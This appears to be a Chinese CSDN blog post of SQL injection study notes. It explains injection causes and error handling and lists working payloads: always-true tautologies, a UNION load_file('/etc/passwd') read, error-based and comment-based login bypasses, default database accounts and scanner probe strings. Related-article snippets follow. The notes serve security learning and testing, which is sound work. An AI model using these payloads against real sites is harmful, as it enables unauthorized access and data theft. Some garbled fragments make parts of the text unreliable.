SQL注入学习笔记

最新推荐文章于 2025-02-06 08:46:23 发布
最新推荐文章于 2025-02-06 08:46:23 发布
阅读量421 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全测试 文章标签: 安全测试 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/dubinglin/article/details/65442746

SQL漏洞

1.构造动态字符串

$query ="select*from table where field ='$_get["input"]' ";

request.getparameter("input")+"' ";

构造的SQL语句

select *from table where field= 'input'

1.转义字符处理不当,数据库将单引号解析成代码与数据间的分界线,还有其他特殊字符

2.数字字符,和字符串,攻击者会读取/etc/passwd文件中的内容,该文件中包含系统用户的用户名和属性

select *from table where

union all selectload_file{'/etc/passwd')--

3.查询集处理不当

 


数据库注入漏洞存在三个关键点:

识别web应用接收的数据输入

修改输入值以包含危险的字符串

检测服务器返回的异常

 

 

 

用户名

密码

作用

解决

'OR '1'='1

 

查询永为真

构造动态字符串

 

'OR '1'='1

查询永为真

$_GET['INPUT']'

"、'、 、||、,、.、

bi'+'kes

 

转义字符处理不当

LAOD_FILE('/etc/passwd')

 

 

数据类型处理不当

user

password

Super_priv

查询集处理不当

 

 

 

错误处理不当

url乱序排列

 

 

多个提交处理不当

root/SYSTEN/Administrator

sa/anonymous

SYS/DBSNMP/PUTLN

不安全的数据库配置

'having 1 '=' 1

 

 

显示数据库语句执行信息

' and 1=0/user;--

 

与下一行,一起披露

显示user变量的值

' group by productid having 1'=' 1

 

出每一列列名

显示productid的第一列

'and 1=0/Password and 1 '=' 1

' and 1=0/User and 1 ' = ' 1

 

类型转换错误技术,纰漏数据

' and User not in('Admin') and 1=0/User and 1'='1

 

 

使用否定条件从结果集中排除

data>'01/01/2009'

 

 

 

''or 1=1;--'AND

'admin'OR 1=1;--'AND

 

跳过and后的数据,忽略注释后面的查询内容

admin/*' AND

'*/'

 

 

 

1.缺少用户输入验证

2.数据和控制结构混合在同一传输通道
产生漏洞:堆,堆栈溢出,格式字符串问题

 

注入控制命令:select、 union、 and、or

 

数据库错误的构造和处理:

将SQL错误显示在页面上,它web浏览器可见

将SQL错误隐藏在Web页面的源代码中以便于调试

检测到错误时跳转到另一个页面

返回HTTP错误代码500(内部服务器错误)或HTTP重定向代码302

应用适当的处理错误而不显示结果,可能会显示一个通用的错误页面

 

数据库注释

数据库

注释

描述

SQL Server或者Oracle

--(double dash)

用于单行注释

 

/*   */

用于多行注释

Mysql

#或者-- double dash

用于单行注释

 

/*  */

用于多行注释

数据库的连接运算符

SQL Server

'a'+'b'='ab'

MySQL

'a' 'b'='ab'

Qracle

'a'||'b'='ab'

 

1.webInspect识别SQL注入漏洞时使用的特征量

'

value'OR

value'OR 5=5 OR 's's='0

value' AND 5=5 OR 's'='0

value' OR 5=0 OR 's'='0

value' AND 5=0OR 's'='0

0+value

value AND 5=5

value AND 5=0

value OR 5=5 OR 4=0

value OR 5=0 OR 4=0

2.Appscan,识别SQL注入漏洞使用的特征值

WF'SQL"Probe;A-B

'+'somechars

   '    

'and

'barfoo'='foobar')--

'hacing 1=1--

somechars'+'

  ';

'and

'barfoo'='foobar'--

a having 1=1--

somechars'||'

  )

'or'foobar'='foobar'--

\'having 1=1--

'||'somechars

  \'

'or'foobar'='foobar')--

....

 

 

 

 

 


sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 702
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
php操作mysqlselect_php如何操作mysql获取select 结果
weixin_42347048的博客
02-19 352
这篇文章主要介绍了php操作mysql获取select 结果的几种方法,需要的朋友可以参考下如果用了 MYSQL_BOTH,将得到一个同时包含关联和数字索引的数组。用 MYSQL_ASSOC 只得到关联索引(如同mysql_fetch_assoc() 那样),用 MYSQL_NUM 只得到数字索引(如同 mysql_fetch_row 那样)。1. mysql_fetch_array($rs,MY...
SQL 术语:Join 中的 Build 和 Probe 是什么意思?
Laurence的技术博客
03-02 1843
我们可能在一些介绍数据库 Join 档中看到 Build 和 Probe,分别代表着 Join 操作中的 右表 和 左表,为什么会有这样的称呼呢?原来它们都出自于一种叫 ”Hash Join“ 的 join 算法(常见的 Join 算法有:Hash Join、Loop Join、Merge Join)。先看一下名词解释:Hash Join:一种实现 Join 的算法,它通过在 Join 的一侧构建 Hash Table 并在另一侧不断匹配 Hash Table 来得到 Join 的结果。
SQL注入测试
weixin_42048395的博客
03-15 910
1 黑盒测试 1.1 手工测试 Web应用的主要注入点有: ① POST请求体中的参数 ② GET请求头URL中的参数 ③ Cookie 1.1.1 内联注入 1、字符串内联注入 下面以绕过某系统登录页面为例,介绍字符串内联注入。 场景① 假设登录页面后台校验机制为:从数据库查询对应用户名和密码,存在返回值验证通过。这种情况在用户名输入框输入’ OR 1 = 1 OR ‘1’ = '1,密码为空,则猜测可构造如下SQL语句绕过后台校验登录系统: SELECT * FROM usertable WHERE
java转义字符之换行字符
JustryDeng
06-25 10万+
我们知道,java代码中,\r和\n和\r\n都表示换行,当我们想输出“\n”时,如果直接写System.println(“\n”);是看不到任何东西的,因为其自动被转义为换行了。 这时,我们就需要使用转义字符了。 这里先给出转义字符: 使用示例: 输出结果为: 注:\r是回车符;\n是换行符。 注:写程序时,代码里面的换行,我们一般都使用'\n'表示换行。如: ...
SQL注入攻击与防御学习笔记
GANDALF THE WHITE的博客
12-09 579
今天正式学习SQL注入啦,和大家一起分享一些笔记。
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1425
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
CTF SQL注入学习笔记
最新发布
2401_86190146的博客
02-06 1184
部分内容来自于SQL注入由简入精_哔哩哔哩_bilibili1.mysqli_error():返回最近调用函数的最后一个错误描述语法:mysqli_error(connection) 规定要使用的Mysql连接; 返回一个带有错误描述的字符串。如果没有错误发生则返回 ""2.mysqli_errno() :函数返回最近调用函数的最后一个错误代码。语法:mysqli_errno(connection);返回错误代码值。如果没有错误发生则返回 0。3.mysqli_fetch_array():从结果集中取得一行
SQL注入详解
qq_48904485的博客
03-21 2万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
Web安全之机器学习 | 数据集和特征值提取
qq_42646885的博客
08-05 2983
数据集 1、KDD 99数据 KDD是知识发现与数据挖掘(Knowledge Discovey and Data Mining)的简称。 2、HTTP DATASET CSIC 2019 HTTP DATASET CSIC 2019包含大量标注过的针对web服务器的36000个正常请求及25000个攻击请求,攻击类型包括sql注入、缓冲区溢出、信息泄露、文件包含、xss等,被广泛用于WAF...
数据库特征值的替换
milli236的博客
05-11 421
常见的Web漏洞——SQL注入
热门推荐
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool的盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
1234
weixin_34258838的博客
08-02 70
WF'SQL"Probe;A--B 转载于:https://blog.51cto.com/xbule/629159
SQL Server】SQL注入
喜欢你,像风走了八千里 不问归期
04-28 898
sql注入,牛腩新闻发布系统
SQL注入知识总结
ma963852的博客
03-30 1万+
目录 漏洞原理 漏洞危害 利用方式 手工注入 手工注入步骤-基于联合查询: 1、判断注入类型 ​2、查询字段数 3、判断回显位 4、查询数据库的基本信息 5、查询数据库中的数据 报错注入 xpath语法错误 ​ 无回显无报错 1,布尔盲注 2,时间盲注 3,带外注入 4,SQL注入命令执行一 4,SQL注入命令执行二 堆叠注入 HTTP头注入 宽字节注入 二次注入 自动化注入 SQLMAP sqlmap特性 输出的内容 设定目标 综...
probe函数个人理解
qianyong1990的专栏
10-18 7206
主要是做一些初始化工作 1、首先这是从网上找到的相关对probe的描述 static int really_probe(struct device *dev, struct device_driver *drv) { ... //1.先是调用的驱动所属总线的probe函数: if (dev->bus->probe) { ret = dev->bus->probe
VC++结合SQL编程的学习笔记精华
学习笔记可能包括了如何在VC++程序中安全地处理用户输入,防止SQL注入攻击,以及如何在SQL中管理用户权限和角色等安全策略。 描述中重复强调的“VC++ SQL 学习笔记”表示该文档是学习VC++与SQL结合使用时的一些心得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值